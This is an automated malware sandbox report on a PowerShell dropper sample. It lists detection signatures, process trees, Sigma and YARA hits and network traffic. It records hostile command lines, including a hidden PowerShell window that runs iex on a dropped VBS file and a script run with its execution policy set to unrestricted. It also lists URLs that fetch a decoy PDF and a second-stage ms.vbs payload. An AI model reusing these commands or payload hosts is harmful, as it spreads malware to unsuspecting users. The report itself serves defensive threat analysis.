

Windows Analysis Report
raEyjKggAf.ps1

Overview

General Information

Sample name: raEyjKggAf.ps1 (renamed because the original name is a hash value)
Original sample name: ae4ce5950a66f479129844f0bc9f43b4802df2bb28995aef29abbf0ba300b270.ps1
Analysis ID: 1578234
MD5: 99bc052a7f6d2e62a0735f79b86a543d
SHA1: eb62356e6d752cb670b6ff3568a376c5fd4adafa
SHA256: ae4ce5950a66f479129844f0bc9f43b4802df2bb28995aef29abbf0ba300b270
Tags: 185-236-228-92, 87-120-112-91, ps1, www-al-rasikh-com, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 2244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 64 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 6420 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 5676 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 4892 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1660,i,1496304434679265413,14723031609339251811,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 988 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 2244; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi64_2244.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security

      System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2244, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'", ProcessId: 64, ProcessName: powershell.exe
Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2244, TargetFilename: C:\Users\Public\hwj.vbs
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", ProcessId: 2244, ProcessName: powershell.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2244, TargetFilename: C:\Users\Public\hwj.vbs
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1", ProcessId: 2244, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 988, ProcessName: svchost.exe
      No Suricata rule has matched


      AV Detection

Source: raEyjKggAf.ps1; Avira: detected
Source: raEyjKggAf.ps1; Virustotal: Detection: 30%
Source: raEyjKggAf.ps1; ReversingLabs: Detection: 34%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 94.3% probability
Source: unknown; HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: Binary string: gn.pdb; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbi; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb=; source: powershell.exe, 00000003.00000002.2208043050.0000018BEFC3F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb; source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb; source: powershell.exe, 00000000.00000002.2320310651.000001E9AD8F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb;; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbU; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32; source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbX; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7BA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb; source: powershell.exe, 00000003.00000002.2205844898.0000018BEF989000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb; source: powershell.exe, 00000003.00000002.2206351579.0000018BEF9C9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nt.Automation.pdb-4437-8B11-F424491E3931}\InprocSe; source: powershell.exe, 00000003.00000002.2203371546.0000018BED8BA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdbw; source: powershell.exe, 00000000.00000002.2414247428.000001E9C78F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32; source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: global traffic; HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1; Host: www.astenterprises.com.pk; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1; Host: www.bluemaxxlaser.com; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 203.175.174.69
Source: Joe Sandbox View; IP Address: 107.161.23.150
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic; DNS traffic detected: DNS query: www.astenterprises.com.pk
Source: global traffic; DNS traffic detected: DNS query: www.bluemaxxlaser.com
Source: global traffic; DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 19 Dec 2024 11:52:49 GMT; Server: Apache; Content-Length: 315; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: text/html; charset=iso-8859-1; Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12C1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://astenterprises.com.pk
Source: powershell.exe, 00000003.00000002.2207789222.0000018BEFC0C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
Source: svchost.exe, 00000007.00000002.3371178265.000002AEC628D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: qmgr.db.7.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.7.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000003.00000002.2182907238.0000018B80903000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://go.micros
Source: powershell.exe, 00000000.00000002.2405807547.000001E9BF98E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405807547.000001E9BF84C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2325977680.000001E9AF7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12C1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.astenterprises.com.pk
Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2325977680.000001E9B1358000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.bluemaxxlaser.com
Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
Source: powershell.exe, 00000000.00000002.2325977680.000001E9AFA12000.00000004.00000800.00020000.00000000.sdmp, raEyjKggAf.ps1; String found in binary or memory: http://www.bluua7maxxlasua7r.com/ms/ms.vbs
Source: powershell.exe, 00000000.00000002.2420839801.000001E9C7A10000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.cox
Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.dr; String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000000.00000002.2325977680.000001E9AF7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B8130E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: edb.log.7.dr; String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000007.00000003.2275115760.000002AEC5FD0000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2325977680.000001E9B0412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80903000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2405807547.000001E9BF98E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405807547.000001E9BF84C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2325977680.000001E9B12BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.astenterprises.com.pk
Source: powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.astenterprises.com.pk/ms/List
Source: powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
Source: powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.astua7ntua7rprisua7s.com.pk/ms/List%20of%20rua7quirua7d%20itua7ms%20and%20sua7rvicua7s.p
Source: unknown; Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49714
Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD34556151
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD34553CFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFD3454193D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFD34545FB6
Source: classification engine; Classification label: mal84.evad.winPS1@20/59@5/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\Desktop\List of Required items and services.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tqwlirn.ki0.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1660,i,1496304434679265413,14723031609339251811,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
